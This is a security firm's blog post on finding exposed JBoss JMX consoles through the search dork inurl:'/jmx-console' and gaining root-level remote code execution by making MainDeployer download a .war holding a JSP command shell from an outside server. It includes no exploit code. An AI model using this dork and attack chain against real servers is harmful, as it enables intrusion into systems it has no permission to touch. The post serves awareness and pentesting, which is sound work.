ODS – Cybersecurity ODS – Cybersecurity
  • SERVICES
    • PENETRATION TESTING
    • TRAINING
    • COMPUTER FORENSICS
  • Contact
  • PRODUCTS
    • SECUREACCESS.COM©
  • BLOG
  • WHO WE ARE
    • CORPORATE RESPONSIBILITY
    • SPONSORSHIPS
    • CAREERS
ODS – Cybersecurity ODS – Cybersecurity
  • SERVICES
    • PENETRATION TESTING
    • TRAINING
    • COMPUTER FORENSICS
  • Contact
  • PRODUCTS
    • SECUREACCESS.COM©
  • BLOG
  • WHO WE ARE
    • CORPORATE RESPONSIBILITY
    • SPONSORSHIPS
    • CAREERS
Oct 23
Hackear_sistemas_JBoss

Hacking systems running JBoss JMX Console with Google & Bing

  • October 23, 2017
  • Gonzalo Garcia
  • ODS Lab

What is well known is that Google / Bing dorks are still one of the easiest ways to detect vulnerabilities in servers and web services. I decided to make this small article and talk about what I consider one of the most effective dorks when it comes to quickly detecting potentially vulnerable servers to Remote Code Execution.

JBoss is a widely used Java Enterprise Edition application server. As is well known, Java EE-based applications often have a large corporate look. This means is very common to find enterprise management applications written in Java, such as Microsoft .NET.

Servers

One of the peculiarities of JBoss is that it provides, by default, a web-based management console that allows you to manage, configure and deploy services within the JBoss server. What is the interesting thing about this? JBoss allows you to deploy services contained in “WAR” packages directly from the web console, so that if it can be accessed from the Internet without any restriction, anyone can deploy Java services on the JBoss server.

The JBoss console is generally in the /jmx-console path. It is not common to change the name of this path, so it is easy to find open consoles with a Google search: inurl:”/jmx-console”. The service is usually found in ports frequently associated with development (8080, 8081 …), although they can also be found in ports related to production environments (80 and 443) and even in less common ports.

Practical example

When accessing one of these consoles, we find an interface similar to the following image:

The console displays an index with all available services. We will focus on the MainDeployer service, although the ServerInfo service may also be interesting.

The ServerInfo service displays information about the server architecture and the operating system on which the JVM runs.

The MainDeployer JBoss service allows you to deploy a .war container. The most dangerous thing about this is the fact that it will accept a URL as source of the .war container and it will download it into its source path.

 

What happens if the container we pass through parameters is in a server we control and whose purpose is to deploy a JSP that accepts by POST or GET parameters, commands that will later be executed in the system?

Bad news. It is possible to execute remote code on the server. In the case of the previous image (a fictitious case in a local environment as a demonstration), control is obtained as a root user on the server. As a reader, if your profile is not technical, this basically means total and absolute control over the vulnerable server.

By automating JBoss consoles searches and performing some scrapping, more than 200 vulnerable different servers can be found after a few seconds. Interesting, isn’t it?

  • About
  • Latest Posts
Gonzalo Garcia
Gonzalo Garcia
Gonzalo began his career in the security field in 2017, and has developed into a talented researcher and security analyst. Since then, he hasn't stopped reporting on important vulnerabilities that Canarian companies, and others in the rest of Spain carry. To the present day, he performs pentests, and develops solutions to protect businesses and public organisations within the Open Data Security team. Gonzalo is also a spokesperson, and he participated in cybersecurity events such as Hackron (Tenerife) and RootedCON (Madrid).
Gonzalo Garcia
Latest posts by Gonzalo Garcia (see all)
  • Hacking systems running JBoss JMX Console with Google & Bing - October 23, 2017
  • Facebook
  • Twitter
  • LinkedIn
  • E-Mail

Comments are closed.

Safe Password Generator
Cybersecurity Guide for Dummies

Recent posts:

  • The keys to get the ISO 27001 certification
  • Managed Security Service – MSSP
  • DDoS Attacks – An In-Depth Guide
  • Cyber security in critical infrastructures
  • How to work on hotel cyber security
TIME TO PROTECT YOUR BUSINESS!

Contact US!

ES: 900 838 167
UK: +44 203 034 0056
US: +1 347 669 9174

FOLLOW US

      Youtube

We promote cyber security

MENU

HOME SERVICES PENETRATION TESTING TRAINING COMPUTER FORENSICS SOCIAL RESPONSIBILITY SPONSORING CAREERS
© 2021 Open Data Security | Legal Warning -   Privacy Policy and Cookies Policy
We use our own and third-party cookies to improve our services, and analyze the traffic on our page. If you accept or continue browsing our website, we understand that you have accepted the installation of cookies. More information in our Cookies Policy.